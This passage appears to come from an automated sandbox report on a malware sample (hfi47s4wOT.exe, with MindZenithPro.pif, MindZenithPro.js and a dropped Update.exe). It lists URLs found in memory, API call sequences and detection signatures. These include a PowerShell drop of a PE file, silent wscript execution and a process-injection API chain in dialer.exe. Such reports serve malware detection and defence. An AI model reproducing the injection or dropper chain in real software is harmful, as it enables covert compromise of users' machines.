00000022.00000003.2588511635.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2590494859.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575635640.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: hfi47s4wOT.exe, 00000000.00000002.1637092103.0000000000408000.00000002.00000001.01000000.00000003.sdmp, hfi47s4wOT.exe, 00000000.00000000.1611617353.0000000000408000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000019.00000002.2551367457.0000000005F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000019.00000002.2547145294.0000000003131000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2575583084.00000000035B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.di
            Source: Update.exe, 0000001E.00000003.2563035496.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2590494859.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575635640.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: Update.exe, 0000001E.00000003.2563035496.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879FE000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FBA0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2590494859.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: Update.exe, 0000001E.00000003.2563035496.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879FE000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FBA0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2590494859.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: Update.exe, 0000001E.00000003.2563035496.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2590494859.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575635640.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: hfi47s4wOT.exe, 00000000.00000003.1620604570.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
            Source: hfi47s4wOT.exe, 00000000.00000003.1620604570.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
            Source: hfi47s4wOT.exe, 00000000.00000003.1620604570.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr306
            Source: hfi47s4wOT.exe, 00000000.00000003.1620604570.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp2.globalsign.com/rootr606
            Source: powershell.exe, 00000019.00000002.2548439087.0000000005086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000019.00000002.2548439087.0000000004F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2576897760.0000000005251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: hfi47s4wOT.exe, 00000000.00000003.1620604570.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
            Source: hfi47s4wOT.exe, 00000000.00000003.1620604570.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
            Source: powershell.exe, 00000019.00000002.2548439087.0000000005086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: hfi47s4wOT.exe, 00000000.00000003.1614139847.00000000028E0000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000000.1651745868.0000000000755000.00000002.00000001.01000000.00000006.sdmp, MindZenithPro.pif, 00000013.00000000.1684597470.0000000000495000.00000002.00000001.01000000.00000008.sdmp, MindZenithPro.pif, 00000014.00000002.1707877237.0000000000495000.00000002.00000001.01000000.00000008.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/X
            Source: Update.exe, 0000001E.00000003.2563035496.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2546839588.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547376672.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547799606.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547535636.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2559795091.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2561708025.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2547169159.000001FA879F0000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2565100973.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2566243341.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2588511635.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2592541409.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575204919.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2590494859.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574932572.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2591843046.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2574429448.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2589853943.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2573637474.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2575635640.000001BD7FB92000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: powershell.exe, 00000019.00000002.2548439087.0000000004F31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001F.00000002.2576897760.0000000005251000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
            Source: powershell.exe, 00000019.00000002.2551367457.0000000005F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000019.00000002.2551367457.0000000005F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000019.00000002.2551367457.0000000005F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io
            Source: Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/
            Source: Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/changelog/
            Source: Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/installation/
            Source: Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cryptography.io/en/latest/security/
            Source: Update.exe, 00000021.00000003.2573855463.000001F13C7E3000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000023.00000003.2599883310.000002066B291000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000023.00000003.2598916175.000002066B2C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.python.org/3/howto/mro.html.
            Source: powershell.exe, 00000019.00000002.2548439087.0000000005086000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: Update.exe, 00000021.00000003.2573956569.000001F13C7BA000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2574377246.000001F13C7B4000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2574844499.000001F13C7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sy
            Source: Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography
            Source: Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/
            Source: Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/actions?query=workflow%3ACI
            Source: Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/issues
            Source: Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/pyca/cryptography/workflows/CI/badge.svg?branch=main
            Source: Update.exe, 00000021.00000003.2574844499.000001F13C7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.py
            Source: Update.exe, 00000021.00000003.2573956569.000001F13C7BA000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2574377246.000001F13C7B4000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2574844499.000001F13C7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader
            Source: Update.exe, 00000021.00000003.2596955655.000001F13CCD7000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2597360664.000001F13CC33000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2597543787.000001F13CCD7000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000023.00000003.2621732064.000002066B75C000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000023.00000003.2621678079.000002066B7CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/python/cpython/issues/86361.
            Source: Update.exe, 00000021.00000003.2573956569.000001F13C7BA000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2574377246.000001F13C7B4000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000021.00000003.2574844499.000001F13C7B8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#
            Source: powershell.exe, 00000019.00000002.2548439087.0000000005579000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://img.shields.io/pypi/v/cryptography.svg
            Source: Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://mail.python.org/mailman/listinfo/cryptography-dev
            Source: powershell.exe, 00000019.00000002.2551367457.0000000005F9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://pypi.org/project/cryptography/
            Source: Update.exe, 0000001E.00000003.2556527860.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584625201.000001BD7FB96000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://readthedocs.org/projects/cryptography/badge/?version=latest
            Source: Update.exe, 0000001E.00000003.2556153238.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584214055.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/
            Source: Update.exe, 0000001E.00000003.2556153238.000001FA879FF000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2556153238.000001FA879F2000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 0000001E.00000003.2556309729.000001FA879FF000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584363779.000001BD7FBA1000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584214055.000001BD7FBA1000.00000004.00000020.00020000.00000000.sdmp, Update.exe, 00000022.00000003.2584214055.000001BD7FB93000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.apache.org/licenses/LICENSE-2.0
            Source: hfi47s4wOT.exe, 00000000.00000003.1620604570.00000000028DB000.00000004.00000020.00020000.00000000.sdmp, Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/autoit3/
            Source: Surrey.pif, 0000000A.00000003.1659496370.0000000003A2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.globalsign.com/repository/0
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0043F4F1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,19_2_0043F4F1
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0043F286 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,19_2_0043F286
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_00459C62 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,19_2_00459C62

            System Summary

            barindex
            Powershell drops PE file
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\Update.exeJump to dropped file
            Windows Scripting host queries suspicious COM object (likely to drop second stage)
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Wscript called in batch mode (surpress errors)
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js"
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.js"
            Source: C:\Windows\System32\dialer.exeCode function: 54_2_00007FF7FB4C10C0 OpenProcess,OpenProcess,K32GetModuleFileNameExW,PathFindFileNameW,lstrlenW,StrCpyW,CloseHandle,StrCmpIW,NtQueryInformationProcess,OpenProcessToken,GetTokenInformation,GetLastError,LocalAlloc,GetTokenInformation,GetSidSubAuthorityCount,GetSidSubAuthority,LocalFree,CloseHandle,StrStrA,VirtualAllocEx,WriteProcessMemory,NtCreateThreadEx,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,54_2_00007FF7FB4C10C0
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0043448D: GetFullPathNameW,_wcslen,CreateDirectoryW,CreateFileW,RemoveDirectoryW,DeviceIoControl,CloseHandle,CloseHandle,19_2_0043448D
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_004218E3 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,19_2_004218E3
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_00403883
            Source: C:\Users\user\AppData\Local\MindZenith Innovations Co\MindZenithPro.pifCode function: 19_2_0042EF37 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,19_2_0042EF37
            Source: C:\Users\user\Desktop\hfi47s4wOT.exeFile created: C:\Windows\TalentedConservationJump to behavior
